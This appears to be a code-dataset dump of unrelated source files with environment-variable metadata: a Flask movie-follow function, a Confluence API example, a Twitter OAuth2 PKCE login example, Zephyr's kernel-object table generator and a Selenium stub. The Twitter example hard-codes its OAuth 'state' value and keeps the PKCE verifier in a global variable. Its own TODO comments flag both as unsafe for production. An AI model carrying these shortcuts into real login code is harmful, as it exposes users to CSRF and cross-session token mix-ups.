'date': str(release_obj['theatre']['small'])
}
]
# For digital releases only
elif digital == 'digital' and theatre is None:
release_date = lookupReleaseDate(movie_id)
release_date = str(release_date['digital']['small'])
movie_type = 'digital'
# For theatrical releases only
elif theatre == 'theatrical' and digital is None:
release_date = lookupReleaseDate(movie_id)
release_date = str(release_date['theatre']['small'])
movie_type = 'theatrical'
# For input with both release types
if release_date is None:
# For each release type
for i in range(len(release_date_list)):
# Check if user is already following this specific release and type
if db.session.query(Follows).filter(
Follows.user_id == g.user.id,
Follows.movie_id == movie['id'],
Follows.movie_date == release_date_list[i]['date'],
Follows.movie_type == release_date_list[i]['type']
).count() > 0:
err_count = err_count + 1
error = 'You are already following the {} release for {}'.format(release_date_list[i]['type'], movie['name'])
# If not -> insert into database
else:
insert_follow = Follows(
g.user.id, movie['id'], movie['name'], release_date_list[i]['date'], release_date_list[i]['type'])
db.session.add(insert_follow)
db.session.commit()
flash('Now following the {} release for {}!'.format(release_date_list[i]['type'], movie['name']), 'success')
if err_count == 2:
error = 'You are already following both release dates for {}'.format(movie['name'])
# For single release types
elif release_date is not None:
# Make sure the user is not following this release and type
if db.session.query(Follows).filter(
Follows.user_id == g.user.id,
Follows.movie_id == movie['id'],
Follows.movie_date == release_date,
Follows.movie_type == movie_type
).count() > 0:
error = 'You are already following the {} release for {}!'.format(movie_type, movie['name'])
# If not -> insert into database
else:
insert_follow = Follows(
g.user.id, movie['id'], movie['name'], release_date, movie_type)
db.session.add(insert_follow)
db.session.commit()
# success message and reload new follows page
flash('Now following the {} release for {}!'.format(movie_type, movie['name']), 'success')
return error
|
[] |
[] |
[
"DATABASE_URL"
] |
[]
|
["DATABASE_URL"]
|
python
| 1 | 0 | |
confluence/examples/childrenDescendant/childrenByType/childrenByType.go
|
package main
import (
"context"
"github.com/ctreminiom/go-atlassian/confluence"
"log"
"os"
)
func main() {
var (
host = os.Getenv("HOST")
mail = os.Getenv("MAIL")
token = os.Getenv("TOKEN")
)
instance, err := confluence.New(nil, host)
if err != nil {
log.Fatal(err)
}
instance.Auth.SetBasicAuth(mail, token)
instance.Auth.SetUserAgent("curl/7.54.0")
var (
contentID = "76513281"
contentType = "page"
expand = []string{"childTypes.all"}
parentVersion = 0
startAt = 0
maxResult = 50
)
contents, response, err := instance.Content.ChildrenDescendant.ChildrenByType(context.Background(), contentID, contentType,
parentVersion, expand, startAt, maxResult)
if err != nil {
if response != nil {
log.Println(response.API)
}
log.Fatal(err)
}
log.Println("Endpoint:", response.Endpoint)
log.Println("Status Code:", response.Code)
for _, content := range contents.Results {
log.Println(content.Type, content.Title, content.ID)
}
}
|
[
"\"HOST\"",
"\"MAIL\"",
"\"TOKEN\""
] |
[] |
[
"MAIL",
"HOST",
"TOKEN"
] |
[]
|
["MAIL", "HOST", "TOKEN"]
|
go
| 3 | 0 | |
main.go
|
package main
import (
"context"
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"io"
"log"
"net/http"
"os"
"github.com/gorilla/mux"
"golang.org/x/oauth2"
)
// TODO: In production, do not use a fixed value; generate and store a distinct value per browser session
// https://www.rfc-editor.org/rfc/rfc6749.html#section-10.12
// The binding value used for CSRF
// protection MUST contain a non-guessable value (as described in Section 10.10),
// and the user-agent's authenticated state (e.g., session cookie, HTML5 local storage) MUST be kept in a location
// accessible only to the client and the user-agent (i.e., protected by same-origin policy)
const state = "FIXME"
var (
config = oauth2.Config{
ClientID: os.Getenv("TWITTER_CLIENT_ID"),
ClientSecret: os.Getenv("TWITTER_CLIENT_SECRET"),
Endpoint: oauth2.Endpoint{
AuthURL: "https://twitter.com/i/oauth2/authorize",
TokenURL: "https://api.twitter.com/2/oauth2/token",
AuthStyle: oauth2.AuthStyleInHeader,
},
RedirectURL: "http://localhost:8080/callback",
Scopes: []string{"tweet.read", "users.read", "tweet.write"},
}
codeVerifier string
)
func main() {
r := mux.NewRouter()
r.HandleFunc("/login", loginHandler).Methods("GET")
r.HandleFunc("/callback", callbackHandler).Methods("GET")
srv := &http.Server{
Handler: r,
Addr: "127.0.0.1:8080",
}
log.Println("Click the following link to login: http://localhost:8080/login")
log.Fatal(srv.ListenAndServe())
}
func loginHandler(w http.ResponseWriter, r *http.Request) {
url := buildAuthorizationURL(config)
log.Println(url)
w.Header().Set("Location", url)
w.WriteHeader(http.StatusFound)
return
}
func buildAuthorizationURL(config oauth2.Config) string {
// PKCE support: https://datatracker.ietf.org/doc/html/rfc7636
// TODO: In production, store the code verifier in the per-browser session
codeVerifier = generateBase64Encoded32byteRandomString()
h := sha256.New()
h.Write([]byte(codeVerifier))
hashed := h.Sum(nil)
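// S256 code challenge: base64url (no padding) encoding of SHA-256(code_verifier), per RFC 7636 section 4.2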
codeChallenge := base64.URLEncoding.WithPadding(base64.NoPadding).EncodeToString(hashed)
url := config.AuthCodeURL(
state,
oauth2.SetAuthURLParam("code_challenge", codeChallenge),
oauth2.SetAuthURLParam("code_challenge_method", "S256"))
return url
}
func callbackHandler(w http.ResponseWriter, r *http.Request) {
queryCode := r.URL.Query().Get("code")
if queryCode == "" {
log.Println("code not found")
w.WriteHeader(http.StatusBadRequest)
return
}
queryState := r.URL.Query().Get("state")
if queryState == "" {
log.Println("state not found")
w.WriteHeader(http.StatusBadRequest)
return
}
if queryState != state {
log.Println("invalid state")
w.WriteHeader(http.StatusBadRequest)
return
}
token, err := config.Exchange(context.Background(), queryCode, oauth2.SetAuthURLParam("code_verifier", codeVerifier))
if err != nil {
log.Printf("failed to exchange token: %v\n", err)
w.WriteHeader(http.StatusBadRequest)
return
}
log.Printf("token scope: %v\n", token.Extra("scope"))
oAuthClient := oauth2.NewClient(r.Context(), oauth2.StaticTokenSource(token))
// https://developer.twitter.com/en/docs/twitter-api/users/lookup/api-reference/get-users-me
res, err := oAuthClient.Get("https://api.twitter.com/2/users/me")
if err != nil {
log.Printf("failed to get me: %v\n", err)
w.WriteHeader(http.StatusInternalServerError)
return
}
defer res.Body.Close()
w.Header().Set("Content-Type", "application/json")
_, _ = io.Copy(w, res.Body)
}
func generateBase64Encoded32byteRandomString() string {
b := make([]byte, 32)
if _, err := io.ReadFull(rand.Reader, b); err != nil {
return ""
}
return base64.URLEncoding.WithPadding(base64.NoPadding).EncodeToString(b)
}
|
[
"\"TWITTER_CLIENT_ID\"",
"\"TWITTER_CLIENT_SECRET\""
] |
[] |
[
"TWITTER_CLIENT_SECRET",
"TWITTER_CLIENT_ID"
] |
[]
|
["TWITTER_CLIENT_SECRET", "TWITTER_CLIENT_ID"]
|
go
| 2 | 0 | |
scripts/gen_kobject_list.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2017 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
"""
Script to generate gperf tables of kernel object metadata
User mode threads making system calls reference kernel objects by memory
address, as the kernel/driver APIs in Zephyr are the same for both user
and supervisor contexts. It is necessary for the kernel to be able to
validate accesses to kernel objects to make the following assertions:
- That the memory address points to a kernel object
- The kernel object is of the expected type for the API being invoked
- The kernel object is of the expected initialization state
- The calling thread has sufficient permissions on the object
For more details see the :ref:`kernelobjects` section in the documentation.
The zephyr build generates an intermediate ELF binary, zephyr_prebuilt.elf,
which this script scans looking for kernel objects by examining the DWARF
debug information to look for instances of data structures that are considered
kernel objects. For device drivers, the API struct pointer populated at build
time is also examined to disambiguate between various device driver instances
since they are all 'struct device'.
This script can generate five different output files:
- A gperf script to generate the hash table mapping kernel object memory
addresses to kernel object metadata, used to track permissions,
object type, initialization state, and any object-specific data.
- A header file containing generated macros for validating driver instances
inside the system call handlers for the driver subsystem APIs.
- A code fragment included by kernel.h with one enum constant for
each kernel object type and each driver instance.
- The inner cases of a switch/case C statement, included by
kernel/userspace.c, mapping the kernel object types and driver
instances to their human-readable representation in the
otype_to_str() function.
- The inner cases of a switch/case C statement, included by
kernel/userspace.c, mapping kernel object types to their sizes.
This is used for allocating instances of them at runtime
(CONFIG_DYNAMIC_OBJECTS) in the obj_size_get() function.
"""
import sys
import argparse
import math
import os
import struct
import json
from distutils.version import LooseVersion
import elftools
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
if LooseVersion(elftools.__version__) < LooseVersion('0.24'):
sys.exit("pyelftools is out of date, need version 0.24 or later")
from collections import OrderedDict
# Keys in this dictionary are structs which should be recognized as kernel
# objects. Values are a tuple:
#
# - The first item is None, or the name of a Kconfig that
# indicates the presence of this object's definition in case it is not
# available in all configurations.
#
# - The second item is a boolean indicating whether it is permissible for
# the object to be located in user-accessible memory.
# Regular dictionaries are ordered only with Python 3.6 and
# above. Good summary and pointers to official documents at:
# https://stackoverflow.com/questions/39980323/are-dictionaries-ordered-in-python-3-6
kobjects = OrderedDict([
("k_mem_slab", (None, False)),
("k_msgq", (None, False)),
("k_mutex", (None, False)),
("k_pipe", (None, False)),
("k_queue", (None, False)),
("k_poll_signal", (None, False)),
("k_sem", (None, False)),
("k_stack", (None, False)),
("k_thread", (None, False)),
("k_timer", (None, False)),
("z_thread_stack_element", (None, False)),
("device", (None, False)),
("sys_mutex", (None, True)),
("k_futex", (None, True))
])
def kobject_to_enum(kobj):
if kobj.startswith("k_") or kobj.startswith("z_"):
name = kobj[2:]
else:
name = kobj
return "K_OBJ_%s" % name.upper()
subsystems = [
# Editing the list is deprecated, add the __subsystem sentinel to your driver
# api declaration instead. e.g.
#
# __subsystem struct my_driver_api {
# ....
#};
]
def subsystem_to_enum(subsys):
return "K_OBJ_DRIVER_" + subsys[:-11].upper()
# --- debug stuff ---
scr = os.path.basename(sys.argv[0])
def debug(text):
if not args.verbose:
return
sys.stdout.write(scr + ": " + text + "\n")
def error(text):
sys.exit("%s ERROR: %s" % (scr, text))
def debug_die(die, text):
if 'DW_AT_decl_file' not in die.attributes:
abs_orig_val = die.attributes["DW_AT_abstract_origin"].value
offset = abs_orig_val + die.cu.cu_offset
for var in variables:
if var.offset == offset:
die = var
break
lp_header = die.dwarfinfo.line_program_for_CU(die.cu).header
files = lp_header["file_entry"]
includes = lp_header["include_directory"]
fileinfo = files[die.attributes["DW_AT_decl_file"].value - 1]
filename = fileinfo.name.decode("utf-8")
filedir = includes[fileinfo.dir_index - 1].decode("utf-8")
path = os.path.join(filedir, filename)
lineno = die.attributes["DW_AT_decl_line"].value
debug(str(die))
debug("File '%s', line %d:" % (path, lineno))
debug(" %s" % text)
# -- ELF processing
DW_OP_addr = 0x3
DW_OP_fbreg = 0x91
STACK_TYPE = "z_thread_stack_element"
thread_counter = 0
sys_mutex_counter = 0
futex_counter = 0
stack_counter = 0
# Global type environment. Populated by pass 1.
type_env = {}
extern_env = {}
variables = []
class KobjectInstance:
def __init__(self, type_obj, addr):
global thread_counter
global sys_mutex_counter
global futex_counter
global stack_counter
self.addr = addr
self.type_obj = type_obj
# Type name determined later since drivers needs to look at the
# API struct address
self.type_name = None
if self.type_obj.name == "k_thread":
# Assign an ID for this thread object, used to track its
# permissions to other kernel objects
self.data = thread_counter
thread_counter = thread_counter + 1
elif self.type_obj.name == "sys_mutex":
self.data = "&kernel_mutexes[%d]" % sys_mutex_counter
sys_mutex_counter += 1
elif self.type_obj.name == "k_futex":
self.data = "&futex_data[%d]" % futex_counter
futex_counter += 1
elif self.type_obj.name == STACK_TYPE:
stack_counter += 1
else:
self.data = 0
class KobjectType:
def __init__(self, offset, name, size, api=False):
self.name = name
self.size = size
self.offset = offset
self.api = api
def __repr__(self):
return "<kobject %s>" % self.name
@staticmethod
def has_kobject():
return True
def get_kobjects(self, addr):
return {addr: KobjectInstance(self, addr)}
class ArrayType:
def __init__(self, offset, elements, member_type):
self.elements = elements
self.member_type = member_type
self.offset = offset
def __repr__(self):
return "<array of %d>" % self.member_type
def has_kobject(self):
if self.member_type not in type_env:
return False
return type_env[self.member_type].has_kobject()
def get_kobjects(self, addr):
mt = type_env[self.member_type]
# Stacks are arrays of _k_stack_element_t but we want to treat
# the whole array as one kernel object (a thread stack)
# Data value gets set to size of entire region
if isinstance(mt, KobjectType) and mt.name == STACK_TYPE:
# An array of stacks appears as a multi-dimensional array.
# The last size is the size of each stack. We need to track
# each stack within the array, not as one huge stack object.
*dimensions, stacksize = self.elements
num_members = 1
for e in dimensions:
num_members = num_members * e
ret = {}
for i in range(num_members):
a = addr + (i * stacksize)
o = mt.get_kobjects(a)
o[a].data = stacksize
ret.update(o)
return ret
objs = {}
# Multidimensional array flattened out
num_members = 1
for e in self.elements:
num_members = num_members * e
for i in range(num_members):
objs.update(mt.get_kobjects(addr + (i * mt.size)))
return objs
class AggregateTypeMember:
def __init__(self, offset, member_name, member_type, member_offset):
self.member_name = member_name
self.member_type = member_type
if isinstance(member_offset, list):
# DWARF v2, location encoded as set of operations
# only "DW_OP_plus_uconst" with ULEB128 argument supported
if member_offset[0] == 0x23:
self.member_offset = member_offset[1] & 0x7f
for i in range(1, len(member_offset)-1):
if member_offset[i] & 0x80:
self.member_offset += (
member_offset[i+1] & 0x7f) << i*7
else:
raise Exception("not yet supported location operation (%s:%d:%d)" %
(self.member_name, self.member_type, member_offset[0]))
else:
self.member_offset = member_offset
def __repr__(self):
return "<member %s, type %d, offset %d>" % (
self.member_name, self.member_type, self.member_offset)
def has_kobject(self):
if self.member_type not in type_env:
return False
return type_env[self.member_type].has_kobject()
def get_kobjects(self, addr):
mt = type_env[self.member_type]
return mt.get_kobjects(addr + self.member_offset)
class ConstType:
def __init__(self, child_type):
self.child_type = child_type
def __repr__(self):
return "<const %d>" % self.child_type
def has_kobject(self):
if self.child_type not in type_env:
return False
return type_env[self.child_type].has_kobject()
def get_kobjects(self, addr):
return type_env[self.child_type].get_kobjects(addr)
class AggregateType:
def __init__(self, offset, name, size):
self.name = name
self.size = size
self.offset = offset
self.members = []
def add_member(self, member):
self.members.append(member)
def __repr__(self):
return "<struct %s, with %s>" % (self.name, self.members)
def has_kobject(self):
result = False
bad_members = []
for member in self.members:
if member.has_kobject():
result = True
else:
bad_members.append(member)
# Don't need to consider this again, just remove it
for bad_member in bad_members:
self.members.remove(bad_member)
return result
def get_kobjects(self, addr):
objs = {}
for member in self.members:
objs.update(member.get_kobjects(addr))
return objs
# --- helper functions for getting data from DIEs ---
def die_get_spec(die):
if 'DW_AT_specification' not in die.attributes:
return None
spec_val = die.attributes["DW_AT_specification"].value
# offset of the DW_TAG_variable for the extern declaration
offset = spec_val + die.cu.cu_offset
return extern_env.get(offset)
def die_get_name(die):
if 'DW_AT_name' not in die.attributes:
die = die_get_spec(die)
if not die:
return None
return die.attributes["DW_AT_name"].value.decode("utf-8")
def die_get_type_offset(die):
if 'DW_AT_type' not in die.attributes:
die = die_get_spec(die)
if not die:
return None
return die.attributes["DW_AT_type"].value + die.cu.cu_offset
def die_get_byte_size(die):
if 'DW_AT_byte_size' not in die.attributes:
return 0
return die.attributes["DW_AT_byte_size"].value
def analyze_die_struct(die):
name = die_get_name(die) or "<anon>"
offset = die.offset
size = die_get_byte_size(die)
# Incomplete type
if not size:
return
if name in kobjects:
type_env[offset] = KobjectType(offset, name, size)
elif name in subsystems:
type_env[offset] = KobjectType(offset, name, size, api=True)
else:
at = AggregateType(offset, name, size)
type_env[offset] = at
for child in die.iter_children():
if child.tag != "DW_TAG_member":
continue
data_member_location = child.attributes.get("DW_AT_data_member_location")
if not data_member_location:
continue
child_type = die_get_type_offset(child)
member_offset = data_member_location.value
cname = die_get_name(child) or "<anon>"
m = AggregateTypeMember(child.offset, cname, child_type,
member_offset)
at.add_member(m)
return
def analyze_die_const(die):
type_offset = die_get_type_offset(die)
if not type_offset:
return
type_env[die.offset] = ConstType(type_offset)
def analyze_die_array(die):
type_offset = die_get_type_offset(die)
elements = []
for child in die.iter_children():
if child.tag != "DW_TAG_subrange_type":
continue
if "DW_AT_upper_bound" not in child.attributes:
continue
ub = child.attributes["DW_AT_upper_bound"]
if not ub.form.startswith("DW_FORM_data"):
continue
elements.append(ub.value + 1)
if not elements:
if type_offset in type_env.keys():
mt = type_env[type_offset]
if mt.has_kobject():
if isinstance(mt, KobjectType) and mt.name == STACK_TYPE:
elements.append(1)
type_env[die.offset] = ArrayType(die.offset, elements, type_offset)
else:
type_env[die.offset] = ArrayType(die.offset, elements, type_offset)
def analyze_typedef(die):
type_offset = die_get_type_offset(die)
if type_offset not in type_env.keys():
return
type_env[die.offset] = type_env[type_offset]
def unpack_pointer(elf, data, offset):
endian_code = "<" if elf.little_endian else ">"
if elf.elfclass == 32:
size_code = "I"
size = 4
else:
size_code = "Q"
size = 8
return struct.unpack(endian_code + size_code,
data[offset:offset + size])[0]
def addr_deref(elf, addr):
for section in elf.iter_sections():
start = section['sh_addr']
end = start + section['sh_size']
if start <= addr < end:
data = section.data()
offset = addr - start
return unpack_pointer(elf, data, offset)
return 0
def device_get_api_addr(elf, addr):
# See include/device.h for a description of struct device
offset = 8 if elf.elfclass == 32 else 16
return addr_deref(elf, addr + offset)
def find_kobjects(elf, syms):
if not elf.has_dwarf_info():
sys.exit("ELF file has no DWARF information")
app_smem_start = syms["_app_smem_start"]
app_smem_end = syms["_app_smem_end"]
di = elf.get_dwarf_info()
# Step 1: collect all type information.
for CU in di.iter_CUs():
for die in CU.iter_DIEs():
# Unions are disregarded, kernel objects should never be union
# members since the memory is not dedicated to that object and
# could be something else
if die.tag == "DW_TAG_structure_type":
analyze_die_struct(die)
elif die.tag == "DW_TAG_const_type":
analyze_die_const(die)
elif die.tag == "DW_TAG_array_type":
analyze_die_array(die)
elif die.tag == "DW_TAG_typedef":
analyze_typedef(die)
elif die.tag == "DW_TAG_variable":
variables.append(die)
# Step 2: filter type_env to only contain kernel objects, or structs
# and arrays of kernel objects
bad_offsets = []
for offset, type_object in type_env.items():
if not type_object.has_kobject():
bad_offsets.append(offset)
for offset in bad_offsets:
del type_env[offset]
# Step 3: Now that we know all the types we are looking for, examine
# all variables
all_objs = {}
for die in variables:
name = die_get_name(die)
if not name:
continue
if name.startswith("__init_sys_init"):
# Boot-time initialization function; not an actual device
continue
type_offset = die_get_type_offset(die)
# Is this a kernel object, or a structure containing kernel
# objects?
if type_offset not in type_env:
continue
if "DW_AT_declaration" in die.attributes:
# Extern declaration, only used indirectly
extern_env[die.offset] = die
continue
if "DW_AT_location" not in die.attributes:
debug_die(die,
"No location information for object '%s'; possibly stack allocated"
% name)
continue
loc = die.attributes["DW_AT_location"]
if loc.form != "DW_FORM_exprloc" and \
loc.form != "DW_FORM_block1":
debug_die(die, "kernel object '%s' unexpected location format" %
name)
continue
opcode = loc.value[0]
if opcode != DW_OP_addr:
# Check if frame pointer offset DW_OP_fbreg
if opcode == DW_OP_fbreg:
debug_die(die, "kernel object '%s' found on stack" % name)
else:
debug_die(die,
"kernel object '%s' unexpected exprloc opcode %s" %
(name, hex(opcode)))
continue
addr = (loc.value[1] | (loc.value[2] << 8) |
(loc.value[3] << 16) | (loc.value[4] << 24))
if addr == 0:
# Never linked; gc-sections deleted it
continue
type_obj = type_env[type_offset]
objs = type_obj.get_kobjects(addr)
all_objs.update(objs)
debug("symbol '%s' at %s contains %d object(s)"
% (name, hex(addr), len(objs)))
# Step 4: objs is a dictionary mapping variable memory addresses to
# their associated type objects. Now that we have seen all variables
# and can properly look up API structs, convert this into a dictionary
# mapping variables to the C enumeration of what kernel object type it
# is.
ret = {}
for addr, ko in all_objs.items():
# API structs don't get into the gperf table
if ko.type_obj.api:
continue
_, user_ram_allowed = kobjects[ko.type_obj.name]
if not user_ram_allowed and app_smem_start <= addr < app_smem_end:
debug_die(die, "object '%s' found in invalid location %s"
% (name, hex(addr)))
continue
if ko.type_obj.name != "device":
# Not a device struct so we immediately know its type
ko.type_name = kobject_to_enum(ko.type_obj.name)
ret[addr] = ko
continue
# Device struct. Need to get the address of its API struct,
# if it has one.
apiaddr = device_get_api_addr(elf, addr)
if apiaddr not in all_objs:
if apiaddr == 0:
debug("device instance at 0x%x has no associated subsystem"
% addr)
else:
debug("device instance at 0x%x has unknown API 0x%x"
% (addr, apiaddr))
# API struct does not correspond to a known subsystem, skip it
continue
apiobj = all_objs[apiaddr]
ko.type_name = subsystem_to_enum(apiobj.type_obj.name)
ret[addr] = ko
debug("found %d kernel object instances total" % len(ret))
# 1. Before python 3.7 dict order is not guaranteed. With Python
# 3.5 it doesn't seem random with *integer* keys but can't
# rely on that.
# 2. OrderedDict means _insertion_ order, so not enough because
# built from other (random!) dicts: need to _sort_ first.
# 3. Sorting memory address looks good.
return OrderedDict(sorted(ret.items()))
def get_symbols(elf):
for section in elf.iter_sections():
if isinstance(section, SymbolTableSection):
return {sym.name: sym.entry.st_value
for sym in section.iter_symbols()}
raise LookupError("Could not find symbol table")
# -- GPERF generation logic
header = """%compare-lengths
%define lookup-function-name z_object_lookup
%language=ANSI-C
%global-table
%struct-type
%{
#include <kernel.h>
#include <toolchain.h>
#include <syscall_handler.h>
#include <string.h>
%}
struct z_object;
"""
# Different versions of gperf have different prototypes for the lookup
# function, best to implement the wrapper here. The pointer value itself is
# turned into a string, we told gperf to expect binary strings that are not
# NULL-terminated.
footer = """%%
struct z_object *z_object_gperf_find(void *obj)
{
return z_object_lookup((const char *)obj, sizeof(void *));
}
void z_object_gperf_wordlist_foreach(_wordlist_cb_func_t func, void *context)
{
int i;
for (i = MIN_HASH_VALUE; i <= MAX_HASH_VALUE; i++) {
if (wordlist[i].name != NULL) {
func(&wordlist[i], context);
}
}
}
#ifndef CONFIG_DYNAMIC_OBJECTS
struct z_object *z_object_find(void *obj)
ALIAS_OF(z_object_gperf_find);
void z_object_wordlist_foreach(_wordlist_cb_func_t func, void *context)
ALIAS_OF(z_object_gperf_wordlist_foreach);
#endif
"""
def write_gperf_table(fp, syms, objs, little_endian, static_begin, static_end):
fp.write(header)
if sys_mutex_counter != 0:
fp.write("static struct k_mutex kernel_mutexes[%d] = {\n"
% sys_mutex_counter)
for i in range(sys_mutex_counter):
fp.write("Z_MUTEX_INITIALIZER(kernel_mutexes[%d])" % i)
if i != sys_mutex_counter - 1:
fp.write(", ")
fp.write("};\n")
if futex_counter != 0:
fp.write("static struct z_futex_data futex_data[%d] = {\n"
% futex_counter)
for i in range(futex_counter):
fp.write("Z_FUTEX_DATA_INITIALIZER(futex_data[%d])" % i)
if i != futex_counter - 1:
fp.write(", ")
fp.write("};\n")
metadata_names = {
"K_OBJ_THREAD" : "thread_id",
"K_OBJ_SYS_MUTEX" : "mutex",
"K_OBJ_FUTEX" : "futex_data"
}
if "CONFIG_GEN_PRIV_STACKS" in syms:
metadata_names["K_OBJ_THREAD_STACK_ELEMENT"] = "stack_data"
if stack_counter != 0:
fp.write("static u8_t Z_GENERIC_SECTION(.priv_stacks.noinit) "
" __aligned(Z_PRIVILEGE_STACK_ALIGN)"
" priv_stacks[%d][CONFIG_PRIVILEGED_STACK_SIZE];\n"
% stack_counter)
fp.write("static struct z_stack_data stack_data[%d] = {\n"
% stack_counter)
counter = 0
for _, ko in objs.items():
if ko.type_name != "K_OBJ_THREAD_STACK_ELEMENT":
continue
# ko.data currently has the stack size. fetch the value to
# populate the appropriate entry in stack_data, and put
# a reference to the entry in stack_data into the data value
# instead
size = ko.data
ko.data = "&stack_data[%d]" % counter
fp.write("\t{ %d, (u8_t *)(&priv_stacks[%d]) }"
% (size, counter))
if counter != (stack_counter - 1):
fp.write(",")
fp.write("\n")
counter += 1
fp.write("};\n")
else:
metadata_names["K_OBJ_THREAD_STACK_ELEMENT"] = "stack_size"
fp.write("%%\n")
# Setup variables for mapping thread indexes
thread_max_bytes = syms["CONFIG_MAX_THREAD_BYTES"]
thread_idx_map = {}
for i in range(0, thread_max_bytes):
thread_idx_map[i] = 0xFF
for obj_addr, ko in objs.items():
obj_type = ko.type_name
# pre-initialized objects fall within this memory range, they are
# either completely initialized at build time, or done automatically
# at boot during some PRE_KERNEL_* phase
initialized = static_begin <= obj_addr < static_end
is_driver = obj_type.startswith("K_OBJ_DRIVER_")
if "CONFIG_64BIT" in syms:
format_code = "Q"
else:
format_code = "I"
if little_endian:
endian = "<"
else:
endian = ">"
byte_str = struct.pack(endian + format_code, obj_addr)
fp.write("\"")
for byte in byte_str:
val = "\\x%02x" % byte
fp.write(val)
flags = "0"
if initialized:
flags += " | K_OBJ_FLAG_INITIALIZED"
if is_driver:
flags += " | K_OBJ_FLAG_DRIVER"
if ko.type_name in metadata_names:
tname = metadata_names[ko.type_name]
else:
tname = "unused"
fp.write("\", {}, %s, %s, { .%s = %s }\n" % (obj_type, flags,
tname, str(ko.data)))
if obj_type == "K_OBJ_THREAD":
idx = math.floor(ko.data / 8)
bit = ko.data % 8
thread_idx_map[idx] = thread_idx_map[idx] & ~(2**bit)
fp.write(footer)
# Generate the array of already mapped thread indexes
fp.write('\n')
fp.write('Z_GENERIC_SECTION(.kobject_data.data) ')
fp.write('u8_t _thread_idx_map[%d] = {' % (thread_max_bytes))
for i in range(0, thread_max_bytes):
fp.write(' 0x%x, ' % (thread_idx_map[i]))
fp.write('};\n')
driver_macro_tpl = """
#define Z_SYSCALL_DRIVER_%(driver_upper)s(ptr, op) Z_SYSCALL_DRIVER_GEN(ptr, op, %(driver_lower)s, %(driver_upper)s)
"""
def write_validation_output(fp):
fp.write("#ifndef DRIVER_VALIDATION_GEN_H\n")
fp.write("#define DRIVER_VALIDATION_GEN_H\n")
fp.write("""#define Z_SYSCALL_DRIVER_GEN(ptr, op, driver_lower_case, driver_upper_case) \\
(Z_SYSCALL_OBJ(ptr, K_OBJ_DRIVER_##driver_upper_case) || \\
Z_SYSCALL_DRIVER_OP(ptr, driver_lower_case##_driver_api, op))
""")
for subsystem in subsystems:
subsystem = subsystem.replace("_driver_api", "")
fp.write(driver_macro_tpl % {
"driver_lower": subsystem.lower(),
"driver_upper": subsystem.upper(),
})
fp.write("#endif /* DRIVER_VALIDATION_GEN_H */\n")
def write_kobj_types_output(fp):
fp.write("/* Core kernel objects */\n")
for kobj, obj_info in kobjects.items():
dep, _ = obj_info
if kobj == "device":
continue
if dep:
fp.write("#ifdef %s\n" % dep)
fp.write("%s,\n" % kobject_to_enum(kobj))
if dep:
fp.write("#endif\n")
fp.write("/* Driver subsystems */\n")
for subsystem in subsystems:
subsystem = subsystem.replace("_driver_api", "").upper()
fp.write("K_OBJ_DRIVER_%s,\n" % subsystem)
def write_kobj_otype_output(fp):
fp.write("/* Core kernel objects */\n")
for kobj, obj_info in kobjects.items():
dep, _ = obj_info
if kobj == "device":
continue
if dep:
fp.write("#ifdef %s\n" % dep)
fp.write('case %s: ret = "%s"; break;\n' %
(kobject_to_enum(kobj), kobj))
if dep:
fp.write("#endif\n")
fp.write("/* Driver subsystems */\n")
for subsystem in subsystems:
subsystem = subsystem.replace("_driver_api", "")
fp.write('case K_OBJ_DRIVER_%s: ret = "%s driver"; break;\n' % (
subsystem.upper(),
subsystem
))
def write_kobj_size_output(fp):
fp.write("/* Non device/stack objects */\n")
for kobj, obj_info in kobjects.items():
dep, _ = obj_info
# device handled by default case. Stacks are not currently handled,
# if they eventually are it will be a special case.
if kobj in {"device", STACK_TYPE}:
continue
if dep:
fp.write("#ifdef %s\n" % dep)
fp.write('case %s: ret = sizeof(struct %s); break;\n' %
(kobject_to_enum(kobj), kobj))
if dep:
fp.write("#endif\n")
def parse_subsystems_list_file(path):
with open(path, "r") as fp:
subsys_list = json.load(fp)
subsystems.extend(subsys_list)
def parse_args():
global args
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-k", "--kernel", required=False,
help="Input zephyr ELF binary")
parser.add_argument(
"-g", "--gperf-output", required=False,
help="Output list of kernel object addresses for gperf use")
parser.add_argument(
"-V", "--validation-output", required=False,
help="Output driver validation macros")
parser.add_argument(
"-K", "--kobj-types-output", required=False,
help="Output k_object enum constants")
parser.add_argument(
"-S", "--kobj-otype-output", required=False,
help="Output case statements for otype_to_str()")
parser.add_argument(
"-Z", "--kobj-size-output", required=False,
help="Output case statements for obj_size_get()")
parser.add_argument("-i", "--include-subsystem-list", required=False, action='append',
help='''Specifies a file with a JSON encoded list of subsystem names to append to
the driver subsystems list. Can be specified multiple times:
-i file1 -i file2 ...''')
parser.add_argument("-v", "--verbose", action="store_true",
help="Print extra debugging information")
args = parser.parse_args()
if "VERBOSE" in os.environ:
args.verbose = 1
def main():
parse_args()
if args.include_subsystem_list is not None:
for list_file in args.include_subsystem_list:
parse_subsystems_list_file(list_file)
if args.gperf_output:
assert args.kernel, "--kernel ELF required for --gperf-output"
elf = ELFFile(open(args.kernel, "rb"))
syms = get_symbols(elf)
max_threads = syms["CONFIG_MAX_THREAD_BYTES"] * 8
objs = find_kobjects(elf, syms)
if not objs:
sys.stderr.write("WARNING: zero kobject found in %s\n"
% args.kernel)
if thread_counter > max_threads:
sys.exit("Too many thread objects ({})\n"
"Increase CONFIG_MAX_THREAD_BYTES to {}"
.format(thread_counter, -(-thread_counter // 8)))
with open(args.gperf_output, "w") as fp:
write_gperf_table(fp, syms, objs, elf.little_endian,
syms["_static_kernel_objects_begin"],
syms["_static_kernel_objects_end"])
if args.validation_output:
with open(args.validation_output, "w") as fp:
write_validation_output(fp)
if args.kobj_types_output:
with open(args.kobj_types_output, "w") as fp:
write_kobj_types_output(fp)
if args.kobj_otype_output:
with open(args.kobj_otype_output, "w") as fp:
write_kobj_otype_output(fp)
if args.kobj_size_output:
with open(args.kobj_size_output, "w") as fp:
write_kobj_size_output(fp)
if __name__ == "__main__":
main()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
test/sanity/require-methods/test.py
|
import time
import os
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__)))
